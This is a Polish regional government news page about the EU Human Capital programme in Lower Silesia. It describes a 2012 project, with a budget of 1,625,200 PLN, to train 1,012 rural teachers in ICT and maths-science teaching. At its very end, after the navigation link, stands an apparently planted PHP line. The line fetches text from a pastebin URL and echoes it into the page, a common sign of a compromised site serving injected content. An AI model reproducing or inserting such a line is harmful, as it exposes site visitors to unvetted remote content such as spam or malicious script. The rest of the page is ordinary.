Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

04.09.2012 Uchwała Zarządu Województwa Dolnośląskiego w sprawie nowego projektu systemowego PODNIESIENIE KOMPETENCJI NAUCZYCIELI Z OBSZARÓW WIEJSKICH DOLNEGO ŚLĄSKA W ZAKRESIE INNOWACYJNYCH METOD NAUCZANIA W OBSZARACH ICT I NAUK MATEMATYCZNO-PRZYRODNICZYCH

W dniu 27 sierpnia 2012 r. Zarząd Województwa Dolnośląskiego podjął Uchwałę nr 2781/IV/12 w sprawie określenia zasad realizacji projektu systemowego pt.: „Podniesienie kompetencji nauczycieli z obszarów wiejskich Dolnego Śląska w zakresie innowacyjnych metod nauczania w obszarach ICT i nauk matematyczno-przyrodniczych”. Projekt jest realizowany przez Samorząd Województwa Dolnośląskiego oraz Dolnośląski Ośrodek Doskonalenia Nauczycieli we Wrocławiu w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.4 Wysoko wykwalifikowane kadry systemu oświaty Programu Operacyjnego Kapitał Ludzki.

Okres realizacji projektu to 01.09.2012 r. – 31.08.2014 r., jego budżet wynosi 1 625 200,00 PLN.

Głównym zamysłem działań podejmowanych w ramach projektu jest Podniesienie kompetencji 1012 nauczycieli z obszarów wiejskich Dolnego Śląska w zakresie innowacyjnych metod nauczania w obszarach ICT i nauk matematyczno–przyrodniczych, którzy nie byli dotąd  objęci tego typu wsparciem w ramach projektów konkursowych i systemowych realizowanych w POKL. Podczas realizacji projektu zakłada się przeprowadzenie kursów z wykorzystaniem platformy edukacyjnej FRONTER dla 1012 nauczycieli,  jak również przygotowanie  przez grupę 1012nauczycieli  projektów edukacyjnych będących efektem obytych szkoleń. W ramach projektu przewidziano również opracowanie i wydanie przewodnika metodycznego, w którym zostaną ujęte projekty edukacyjne, opatrzone  komentarzem metodycznym. Podręcznik zostanie udostępniony zainteresowanym nauczycielom, chcącym z niego skorzystać.


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");